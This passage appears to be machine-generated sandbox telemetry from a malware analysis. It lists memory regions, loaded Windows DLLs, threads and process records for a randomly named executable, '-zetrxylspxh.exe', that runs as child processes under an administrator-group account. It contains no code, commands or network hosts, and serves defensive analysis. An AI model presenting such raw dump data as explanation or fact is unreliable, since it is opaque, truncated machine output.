mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4627 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4628 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 4629 start_va = 0x500000 end_va = 0x5bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4630 start_va = 0x6a0000 end_va = 0x79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 4631 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 4632 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 5121 start_va = 0x440000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 5122 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 5123 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 5124 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5125 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 5126 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 5127 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 5128 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 5129 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 5130 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5131 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 5132 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 5133 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 5134 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 5135 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 5136 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 5137 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 5138 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 5139 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 5140 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 5141 start_va = 0x6c540000 end_va = 0x6c5d1fff monitored = 0 entry_point = 0x6c54dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 5501 start_va = 0x480000 end_va = 0x4bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 5502 start_va = 0x8a0000 end_va = 0x99ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008a0000" filename = "" Region: id = 5503 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5504 start_va = 0x9a0000 end_va = 0xb27fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009a0000" filename = "" Region: id = 5505 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 127 os_tid = 0x874 Thread: id = 164 os_tid = 0x1238 Thread: id = 179 os_tid = 0x1048 Process: id = "38" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0x10603000" os_pid = "0x718" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4238 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4239 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4240 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4241 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 4242 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 4243 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 4244 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4245 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 4246 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4247 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 4248 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4249 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 4250 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4251 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4252 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4253 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 4633 start_va = 0x560000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 4634 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4635 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4636 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4637 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4638 start_va = 0x440000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 4639 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4640 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4641 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4642 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 4643 start_va = 0x570000 end_va = 0x62dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4644 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 5142 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 5143 start_va = 0x630000 end_va = 0x66ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 5144 start_va = 0x670000 end_va = 0x76ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 5145 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 5146 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5147 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 5148 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 5149 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 5150 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 5151 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 5152 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5153 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 5154 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 5155 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 5156 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 5157 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 5158 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 5159 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 5160 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 5161 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 5162 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 5506 start_va = 0x770000 end_va = 0x7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 5507 start_va = 0x7b0000 end_va = 0x8affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007b0000" filename = "" Region: id = 5583 start_va = 0x8b0000 end_va = 0x8effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008b0000" filename = "" Region: id = 5584 start_va = 0x8f0000 end_va = 0x9effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008f0000" filename = "" Region: id = 5585 start_va = 0x6c540000 end_va = 0x6c5d1fff monitored = 0 entry_point = 0x6c54dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 5586 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5587 start_va = 0x9f0000 end_va = 0xb77fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009f0000" filename = "" Region: id = 5588 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 128 os_tid = 0x47c Thread: id = 165 os_tid = 0xec Thread: id = 180 os_tid = 0x12ec Thread: id = 203 os_tid = 0x13c4 Process: id = "39" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0xd008000" os_pid = "0x948" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4262 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4263 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4264 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4265 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 4266 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 4267 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 4268 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4269 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 4270 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4271 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 4272 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4273 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 4274 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4275 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4276 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4277 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 4669 start_va = 0x5c0000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 4670 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4671 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4672 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4673 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4674 start_va = 0x5d0000 end_va = 0x85ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 4675 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4676 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4677 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4678 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 4679 start_va = 0x440000 end_va = 0x4fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4680 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 5168 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 5169 start_va = 0x500000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 5170 start_va = 0x5d0000 end_va = 0x6cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 5171 start_va = 0x760000 end_va = 0x85ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 5172 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 5173 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5174 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 5175 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 5176 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 5177 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 